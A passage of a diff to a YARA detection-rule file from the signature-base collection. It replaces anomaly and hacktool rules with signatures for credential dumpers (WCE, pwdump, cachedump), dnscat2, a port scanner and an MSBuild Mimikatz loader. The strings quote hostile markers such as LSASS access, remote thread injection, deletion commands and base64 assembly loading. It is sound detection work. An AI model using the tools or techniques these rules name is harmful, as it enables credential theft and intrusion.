+		score = 100
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = ". . . . : Yes" ascii
-		$s2 = "with 32 bytes of data:" ascii
-		$s3 = "ff-ff-ff-ff-ff-ff     static" ascii
-		$s4 = "  TCP    0.0.0.0:445" ascii
-		$s5 = "System Idle Process" ascii
+		$s0 = "PSAttack.exe" fullword ascii
 
 	condition:
-		filesize < 150KB and 4 of them
+		uint16( 0 ) == 0x4b50 and all of them
 }
-rule SIGNATURE_BASE_SUSP_TINY_PE : FILE
+rule SIGNATURE_BASE_Linux_Portscan_Shark_1 : FILE
 {
 	meta:
-		description = "Detects Tiny PE file"
+		description = "Detects Linux Port Scanner Shark"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5081c24e-91d1-5705-9459-f675be4f0e3c"
-		date = "2019-10-23"
-		modified = "2023-12-05"
-		reference = "https://webserver2.tecgraf.puc-rio.br/~ismael/Cursos/YC++/apostilas/win32_xcoff_pe/tyne-example/Tiny%20PE.htm"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_file_anomalies.yar#L3-L15"
+		id = "0b264106-3536-56f4-9e8c-68f3756af07d"
+		date = "2016-04-01"
+		modified = "2025-12-18"
+		reference = "Virustotal Research - see https://github.com/Neo23x0/Loki/issues/35"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3190-L3207"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5eabfa8e0fd4d6d1376d263484fba985e7a4b05d68046be1f79c1dfdbbfff9e5"
-		score = 80
+		logic_hash = "e807ed6c83c8d908bfe29c65abd7b877b65655cc64cd1497fc124a2fd88cd1e9"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "4da0e535c36c0c52eaa66a5df6e070c52e7ddba13816efc3da5691ea2ec06c18"
+		hash2 = "e395ca5f932419a4e6c598cae46f17b56eb7541929cdfb67ef347d9ec814dea3"
 
 	strings:
-		$header = { 4D 5A 00 00 50 45 00 00 }
+		$s0 = "rm -rf scan.log session.txt" fullword ascii
+		$s17 = "*** buffer overflow detected ***: %s terminated" fullword ascii
+		$s18 = "*** stack smashing detected ***: %s terminated" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and uint16( 4 ) == 0x4550 and filesize <= 20KB and $header at 0
+		( uint16( 0 ) == 0x7362 and all of them )
 }
-rule SIGNATURE_BASE_SUSP_GIF_Anomalies : FILE
+rule SIGNATURE_BASE_Linux_Portscan_Shark_2
 {
 	meta:
-		description = "Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type"
+		description = "Detects Linux Port Scanner Shark"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2e77c2ff-a8f6-5444-a93d-843312640a28"
-		date = "2020-07-02"
-		modified = "2023-12-05"
-		reference = "https://en.wikipedia.org/wiki/GIF"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_file_anomalies.yar#L17-L30"
+		id = "eea378d5-0399-5035-8573-139878fa1abc"
+		date = "2016-04-01"
+		modified = "2025-12-18"
+		reference = "Virustotal Research - see https://github.com/Neo23x0/Loki/issues/35"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3209-L3226"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "64d17c8de72600cd889a802fd002faaaf9a3a17f7fa157ae5b2b620b28e6c439"
-		score = 60
+		logic_hash = "45efbbe01c45065efc07e9c75b6a7cdcae469861f84df4a1e1381fe864f7ddc0"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "5f80bd2db608a47e26290f3385eeb5bfc939d63ba643f06c4156704614def986"
+		hash2 = "90af44cbb1c8a637feda1889d301d82fff7a93b0c1a09534909458a64d8d8558"
+
+	strings:
+		$s1 = "usage: %s <fisier ipuri> <fisier useri:parole> <connect timeout> <fail2ban wait> <threads> <outfile> <port>" fullword ascii
+		$s2 = "Difference between server modulus and host modulus is only %d. It's illegal and may not work" fullword ascii
+		$s3 = "rm -rf scan.log" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x4947 and uint8( 2 ) == 0x46 and uint8( 11 ) != 0x00 and uint8( 12 ) != 0x00 and uint8( filesize -1 ) != 0x3b
+		all of them
 }
-
-rule SIGNATURE_BASE_SUSP_Hxd_Icon_Anomaly_May23_1 : FILE
+rule SIGNATURE_BASE_Dnscat2_Hacktool : FILE
 {
 	meta:
-		description = "Detects suspicious use of the the free hex editor HxD's icon in PE files that don't seem to be a legitimate version of HxD"
-		author = "Florian Roth"
-		id = "3ac8cc92-6d76-5787-ada0-cfb6eabb4b20"
-		date = "2023-05-29"
-		modified = "2023-12-05"
-		reference = "https://www.linkedin.com/feed/update/urn:li:activity:7068631930040188929/?utm_source=share&utm_medium=member_ios"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_file_anomalies.yar#L32-L84"
+		description = "Detects dnscat2 - from files dnscat, dnscat2.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "23cca0fe-3e4e-5b91-8b53-933de8ff264a"
+		date = "2016-05-15"
+		modified = "2025-12-18"
+		reference = "https://downloads.skullsecurity.org/dnscat2/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3235-L3254"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a328687ac8b868fb78a49188b286a8951c6043a7ff6ff0c7a23c3f9b3ef15eb2"
-		score = 65
+		logic_hash = "c163a62b607323e08ca083a7091585550c830827728a8a60e25af8db6550ed1c"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "8bc8d6c735937c9c040cbbdcfc15f17720a7ecef202a19a7bf43e9e1c66fe66a"
+		hash2 = "4a882f013419695c8c0ac41d8a0fde1cf48172a89e342c504138bc6f1d13c7c8"
 
 	strings:
-		$ac1 = { 99 00 77 0D DD 09 99 80 99 00 77 0D DD 09 99 80
-               99 00 77 0D DD 09 99 80 99 00 77 0D DD 09 99 80
-               99 00 77 0D DD 09 99 80 99 00 77 0D DD 09 99 80
-               99 00 77 0D DD 09 99 80 99 00 77 0D DD 09 99 80
-               99 00 77 0D DD 09 99 80 99 00 77 0D D0 99 98 09
-               99 99 00 0D D0 99 98 09 99 99 00 0D D0 99 98 09
-               99 99 00 0D D0 99 98 0F F9 99 00 0D D0 99 98 09
-               9F 99 00 0D D0 99 98 09 FF 99 00 0D D0 99 98 09
-               FF 99 00 0D D0 99 98 09 99 99 00 0D D0 99 98 0F
-               F9 99 00 0D D0 99 98 09 99 99 00 0D 09 99 80 9F
-               F9 99 99 00 09 99 80 99 F9 99 99 00 09 99 80 FF }
-		$ac2 = { FF FF FF FF FF FF FF FF FF FF FF FF FF FF B9 DE
-               FA 68 B8 F4 39 A2 F1 39 A2 F1 39 A2 F1 39 A2 F1
-               39 A2 F1 39 A2 F1 68 B8 F4 B9 DE FA FF FF FF FF
-               FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF }
-		$s1 = { 00 4D 00 61 00 EB 00 6C 00 20 00 48 00 F6 00 72 00 7A }
-		$s2 = "mh-nexus.de" ascii wide
-		$upx1 = "UPX0" ascii fullword
-		$xs1 = "terminator" ascii wide fullword
-		$xs2 = "Terminator" ascii wide fullword
+		$s1 = "--exec -e <process>     Execute the given process and link it to the stream." fullword ascii
+		$s2 = "Sawlog" fullword ascii
+		$s3 = "COMMAND_EXEC [request] :: request_id: 0x%04x :: name: %s :: command: %s" fullword ascii
+		$s4 = "COMMAND_SHELL [request] :: request_id: 0x%04x :: name: %s" fullword ascii
+		$s5 = "[Tunnel %d] connection to %s:%d closed by the server!" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of ( $ac* ) and ( not 1 of ( $s* ) or filesize > 6930000 or ( pe.is_32bit ( ) and filesize < 1540000 and not $upx1 ) or ( pe.is_32bit ( ) and filesize < 590000 and $upx1 ) or ( pe.is_64bit ( ) and filesize < 6670000 and not $upx1 ) or ( pe.is_64bit ( ) and filesize < 1300000 and $upx1 ) or 1 of ( $xs* ) )
+		(( uint16( 0 ) == 0x457f or uint16( 0 ) == 0x5a4d ) and filesize < 400KB and ( 2 of ( $s* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_SUSP_Qakbot_Uninstaller_Shellcode_Aug23
+rule SIGNATURE_BASE_WCE_In_Memory
 {
 	meta:
-		description = "Detects Qakbot Uninstaller files used by the FBI and Dutch National Police in a disruption operation against the Qakbot in August 2023"
-		author = "Florian Roth"
-		id = "860796ab-689f-5c5f-bc40-3e2ef7fd1d5d"
-		date = "2023-08-30"
-		modified = "2023-12-05"
-		reference = "https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_qakbot_uninstaller.yar#L2-L14"
+		description = "Detects Windows Credential Editor (WCE) in memory (and also on disk)"
+		author = "Florian Roth (Nextron Systems)"
+		id = "90c90ca5-e3be-5035-b35c-c2e7faec43a5"
+		date = "2016-08-28"
+		modified = "2025-12-18"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3256-L3270"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "91d26c50bf29517aa68e709ca3b6f32f4ca390f4c2f48e48cd251bfdd5dbcc71"
-		score = 60
+		logic_hash = "74ab7772db5b1de8a4eae03370e2be3cd35004730f84d472677688109a1d6d88"
+		score = 80
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xc1 = { E8 00 00 00 00 58 55 89 E5 89 C2 68 03 00 00 00 68 00 2C 00 00 05 20 0A 00 00 50 E8 05 00 00 00 83 C4 04 C9 C3 81 EC 08 01 00 00 53 55 56 57 6A 6B 58 6A 65 5B 6A 72 66 89 84 24 D4 00 00 00 33 }
+		$s1 = "wkKUSvflehHr::o:t:s:c:i:d:a:g:" fullword ascii
+		$s2 = "wceaux.dll" fullword ascii
 
 	condition:
-		$xc1
+		all of them
 }
-rule SIGNATURE_BASE_SUSP_Qakbot_Uninstaller_FBI_Aug23
+rule SIGNATURE_BASE_Pstgdump : FILE
 {
 	meta:
-		description = "Detects Qakbot uninstaller used by the FBI / Dutch Police"
-		author = "Florian Roth"
-		id = "499bff56-ff49-53df-9922-227b816c0a36"
-		date = "2023-08-31"
-		modified = "2023-12-05"
-		reference = "https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_qakbot_uninstaller.yar#L16-L34"
+		description = "Detects a tool used by APT groups - file pstgdump.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "86a105a3-b5b5-58b2-99bd-ec05f31adb6b"
+		date = "2016-09-08"
+		modified = "2025-12-18"
+		reference = "http://goo.gl/igxLyF"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3272-L3290"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0ce963190502709edec9434e6a64cb9db7c5553113b686afc56a516350d76baa"
-		score = 60
+		logic_hash = "0c4f8697b1b65007acc4fdabd1c6263a428448232f95dbb12d8f737297893157"
+		score = 75
 		quality = 85
-		tags = ""
-		hash1 = "559cae635f0d870652b9482ef436b31d4bb1a5a0f51750836f328d749291d0b6"
-		hash2 = "855eb5481f77dde5ad8fa6e9d953d4aebc280dddf9461144b16ed62817cc5071"
-		hash3 = "fab408536aa37c4abc8be97ab9c1f86cb33b63923d423fdc2859eb9d63fa8ea0"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "65d48a2f868ff5757c10ed796e03621961954c523c71eac1c5e044862893a106"
 
 	strings:
-		$op1 = { 69 c1 65 89 07 6c 03 c2 89 84 95 24 f6 ff ff 8b 55 e4 42 89 55 e4 81 fa 70 02 00 00 7c d4 }
-		$op2 = { 42 89 55 e4 81 fa 70 02 00 00 7c d4 f2 0f 10 0d a0 31 00 10 33 f6 f2 0f 10 15 a8 31 00 10 66 90 }
-		$op5 = { 68 48 31 00 10 6a 28 57 e8 e4 fd ff ff 8b 4d fc 83 c4 4c 33 cd 33 c0 }
-		$op6 = { 33 c0 66 39 06 74 0f 0f 1f 80 00 00 00 00 40 66 83 3c 46 00 75 f8 8d 3c 00 }
+		$x1 = "\\Release\\pstgdump.pdb" ascii
+		$x2 = "Failed to dump all protected storage items - see previous messages for details" fullword ascii
+		$x3 = "ptsgdump [-h][-q][-u Username][-p Password]" fullword ascii
+		$x4 = "Attempting to impersonate domain user '%s' in domain '%s'" fullword ascii
+		$x5 = "Failed to impersonate user (ImpersonateLoggedOnUser failed): error %d" fullword ascii
+		$x6 = "Unable to obtain handle to PStoreCreateInstance in pstorec.dll" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of ( $x* ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_CN_Tools_Xbat : FILE
+rule SIGNATURE_BASE_Lsremora : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file xbat.vbs"
+		description = "Detects a tool used by APT groups"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5b2f0d2e-a7fb-5f5a-94a9-28e851c9756e"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktool_scripts.yar#L10-L24"
+		id = "c15c583f-70cd-5a80-bdea-a14582097e50"
+		date = "2016-09-08"
+		modified = "2025-12-18"
+		reference = "http://goo.gl/igxLyF"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3292-L3314"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a7005acda381a09803b860f04d4cae3fdb65d594"
-		logic_hash = "c6dae76bbda7b43eef348c61e1330405923baf724f1aa5d2b51132dde89248fe"
+		logic_hash = "ac8f6b7284307456749b3386340a2b3deb0718bc68875bc90bccf74a96469a59"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "efa66f6391ec471ca52cd053159c8a8778f11f921da14e6daf76387f8c9afcd5"
+		hash2 = "e0327c1218fd3723e20acc780e20135f41abca35c35e0f97f7eccac265f4f44e"
 
 	strings:
-		$s0 = "ws.run \"srss.bat /start\",0 " fullword ascii
-		$s1 = "Set ws = Wscript.CreateObject(\"Wscript.Shell\")" fullword ascii
+		$x1 = "Target: Failed to load primary SAM functions." fullword ascii
+		$x2 = "lsremora64.dll" fullword ascii
+		$x3 = "PwDumpError:999999" fullword wide
+		$x4 = "PwDumpError" fullword wide
+		$x5 = "lsremora.dll" fullword ascii
+		$s1 = ":\\\\.\\pipe\\%s" fullword ascii
+		$s2 = "x%s_history_%d:%d" fullword wide
+		$s3 = "Using pipe %s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x6553 and filesize < 0KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of ( $x* ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_CN_Tools_Temp : FILE
+rule SIGNATURE_BASE_Servpw : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file Temp.war"
+		description = "Detects a tool used by APT groups - file servpw.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4fbaabd0-fbf2-56a0-94af-9deba1e7cc81"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktool_scripts.yar#L26-L42"
+		id = "48b9dae1-16b3-563c-ac4e-b71f3a86b38a"
+		date = "2016-09-08"
+		modified = "2025-12-18"
+		reference = "http://goo.gl/igxLyF"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3316-L3335"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c3327ef63b0ed64c4906e9940ef877c76ebaff58"
-		logic_hash = "05fd1cb3f7c8b96ccf824013c130a0b21f43724463f8658e23239d009be7f4fe"
+		logic_hash = "150466c23ea7aa20f6e60c592ab6bd2f42e3a48a65a6665b89a9f19fa61aae8f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "97b39ac28794a7610ed83ad65e28c605397ea7be878109c35228c126d43e2f46"
+		hash2 = "0f340b471ef34c69f5413540acd3095c829ffc4df38764e703345eb5e5020301"
 
 	strings:
-		$s0 = "META-INF/context.xml<?xml version=\"1.0\" encoding=\"UTF-8\"?>" fullword ascii
-		$s1 = "browser.jsp" fullword ascii
-		$s3 = "cmd.jsp" fullword ascii
-		$s4 = "index.jsp" fullword ascii
+		$s1 = "Unable to open target process: %d, pid %d" fullword ascii
+		$s2 = "LSASS.EXE" fullword wide
+		$s3 = "WriteProcessMemory failed: %d" fullword ascii
+		$s4 = "lsremora64.dll" fullword ascii
+		$s5 = "CreateRemoteThread failed: %d" fullword ascii
+		$s6 = "Thread code: %d, path: %s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x4b50 and filesize < 203KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 3 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_CN_Tools_Srss : FILE
+rule SIGNATURE_BASE_Fgexec : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file srss.bat"
+		description = "Detects a tool used by APT groups - file fgexec.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "13191e2e-fbcd-5e0b-af55-cc10f2583c1b"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktool_scripts.yar#L44-L58"
+		id = "8ffe47b9-81a8-5eb4-b46f-db9d23682de4"
+		date = "2016-09-08"
+		modified = "2025-12-18"
+		reference = "http://goo.gl/igxLyF"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3337-L3353"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "092ab0797947692a247fe80b100fb4df0f9c37a0"
-		logic_hash = "e01fd60adc32be26b0940ecc127a17bfcfe2ebfcf6cefea76ba6adc61d3c18d4"
+		logic_hash = "3672255d7829520aa8ca792519f645b86fe4244a16652a960375f23baa7d32b3"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8697897bee415f213ce7bc24f22c14002d660b8aaffab807490ddbf4f3f20249"
 
 	strings:
-		$s0 = "srss.exe -idx 0 -ip"
-		$s1 = "-port 21 -logfilter \"_USER ,_P" ascii
+		$x1 = "\\Release\\fgexec.pdb" ascii
+		$x2 = "fgexec Remote Process Execution Tool" fullword ascii
+		$x3 = "fgexec CallNamedPipe failed" fullword ascii
+		$x4 = "fizzgig and the mighty foofus.net team" fullword ascii
 
 	condition:
-		filesize < 100 and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of ( $x* ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_Dll_Unreg : FILE
+rule SIGNATURE_BASE_Cachedump : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file UnReg.bat"
+		description = "Detects a tool used by APT groups - from files cachedump.exe, cachedump64.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5c14486d-72a2-5a18-9db0-ce0ab61fdce7"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktool_scripts.yar#L60-L74"
+		id = "ebcaeb73-d2df-5a4c-9f50-b4a01293b88b"
+		date = "2016-09-08"
+		modified = "2025-12-18"
+		reference = "http://goo.gl/igxLyF"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3355-L3375"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d5e24ba86781c332d0c99dea62f42b14e893d17e"
-		logic_hash = "0e534e475a5b4338aa53bea09325dd63a3d451a13b46a70b5208cabd2deecabe"
+		logic_hash = "7e4d710ed9dab12114e87fa33abe6db6245c780b31bcd94fbd21e75aaa355ca8"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "cf58ca5bf8c4f87bb67e6a4e1fb9e8bada50157dacbd08a92a4a779e40d569c4"
+		hash2 = "e38edac8c838a043d0d9d28c71a96fe8f7b7f61c5edf69f1ce0c13e141be281f"
 
 	strings:
-		$s0 = "regsvr32.exe /u C:\\windows\\system32\\PacketX.dll" fullword ascii
-		$s1 = "del /F /Q C:\\windows\\system32\\PacketX.dll" fullword ascii
+		$s1 = "Failed to open key SECURITY\\Cache in RegOpenKeyEx. Is service running as SYSTEM ? Do you ever log on domain ? " fullword ascii
+		$s2 = "Unable to open LSASS.EXE process" fullword ascii
+		$s3 = "Service not found. Installing CacheDump Service (%s)" fullword ascii
+		$s4 = "CacheDump service successfully installed." fullword ascii
+		$s5 = "Kill CacheDump service (shouldn't be used)" fullword ascii
+		$s6 = "cacheDump [-v | -vv | -K]" fullword ascii
 
 	condition:
-		filesize < 1KB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 1 of them ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_Dll_Reg : FILE
+rule SIGNATURE_BASE_Pwdump_B : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file Reg.bat"
+		description = "Detects a tool used by APT groups - file PwDump.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "97c0d9ff-6a12-57e3-8219-6c1843a03a29"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktool_scripts.yar#L76-L90"
+		id = "aad974f1-76bf-5aae-8376-a4fd3f27b345"
+		date = "2016-09-08"
+		modified = "2025-12-18"
+		reference = "http://goo.gl/igxLyF"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3377-L3397"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cb8a92fe256a3e5b869f9564ecd1aa9c5c886e3f"
-		logic_hash = "db2032d5689f9fcfc446d5ebe8a6d28c6dbd8bcd1d93769ec969d76f8add4f9d"
+		logic_hash = "d50ad359b9433439cddda9408d227f35ee8de3280ad24f42c5e6ef1e6a1526bd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3c796092f42a948018c3954f837b4047899105845019fce75a6e82bc99317982"
 
 	strings:
-		$s0 = "copy PacketX.dll C:\\windows\\system32\\PacketX.dll" fullword ascii
-		$s1 = "regsvr32.exe C:\\windows\\system32\\PacketX.dll" fullword ascii
+		$x1 = "Usage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machineName" fullword ascii
+		$x2 = "pwdump6 Version %s by fizzgig and the mighty group at foofus.net" fullword ascii
+		$x3 = "where -x targets a 64-bit host" fullword ascii
+		$x4 = "Couldn't delete target executable from remote machine: %d" fullword ascii
+		$s1 = "lsremora64.dll" fullword ascii
+		$s2 = "lsremora.dll" fullword ascii
+		$s3 = "servpw.exe" fullword ascii
 
 	condition:
-		filesize < 1KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of ( $x* ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_Sbin_Squid : FILE
+rule SIGNATURE_BASE_Msbuild_Mimikatz_Execution_Via_XML
 {
 	meta:
-		description = "Chinese Hacktool Set - file squid.bat"
+		description = "Detects an XML that executes Mimikatz on an endpoint via MSBuild"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e7302e90-d072-599b-a8f2-bf1f21a84de9"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktool_scripts.yar#L92-L108"
+		id = "98aa68b9-6de4-5353-8d87-9e974529c044"
+		date = "2016-10-07"
+		modified = "2025-12-18"
+		reference = "https://gist.github.com/subTee/c98f7d005683e616560bda3286b6a0d8#file-katz-xml"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3408-L3427"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8b795a8085c3e6f3d764ebcfe6d59e26fdb91969"
-		logic_hash = "c440bcfda55f926354ea5e462fe1e6a0e9e9585bb1c1539c0aa0588405a46105"
+		logic_hash = "f926a2d5ab987b97c6ed2a89c69eac5549d8b7885bdbf75ce40e05e6ce6cfa7a"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "del /s /f /q" fullword ascii
-		$s1 = "squid.exe -z" fullword ascii
-		$s2 = "net start Squid" fullword ascii
-		$s3 = "net stop Squid" fullword ascii
+		$x1 = "<Project ToolsVersion=" ascii
+		$x2 = "</SharpLauncher>" fullword ascii
+		$s1 = "\"TVqQAAMAAAA" ascii
+		$s2 = "System.Convert.FromBase64String(" ascii
+		$s3 = ".Invoke(" ascii
+		$s4 = "Assembly.Load(" ascii
+		$s5 = ".CreateInstance(" ascii
 
 	condition:
-		filesize < 1KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Sql1433_Creck : FILE
+rule SIGNATURE_BASE_Fscan_Portscanner : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file creck.bat"
+		description = "Fscan port scanner scan output / strings"
 		author = "Florian Roth (Nextron Systems)"
-		id = "38a91464-d493-5154-86ec-e54b3e25309b"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktool_scripts.yar#L110-L125"
+		id = "400383dc-8bc0-5e77-a3f3-d6ba9f4c3c0f"
+		date = "2017-01-06"
+		modified = "2025-12-18"
+		reference = "https://twitter.com/JamesHabben/status/817112447970480128"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3438-L3452"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "189c11a3b268789a3fbcfac3bd4e03cbfde87b1d"
-		logic_hash = "2d9ff5f130d625450e7de41832695839f0427a6186569280a224f20e89fe1d8a"
+		logic_hash = "35770f040da0b14fe4492a44383e332c9912bd89943838627491196ce8f0ec37"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "start anhao3.exe -i S.txt -p  pass3.txt -o anhao.txt -l Them.txt -t 1000" fullword ascii
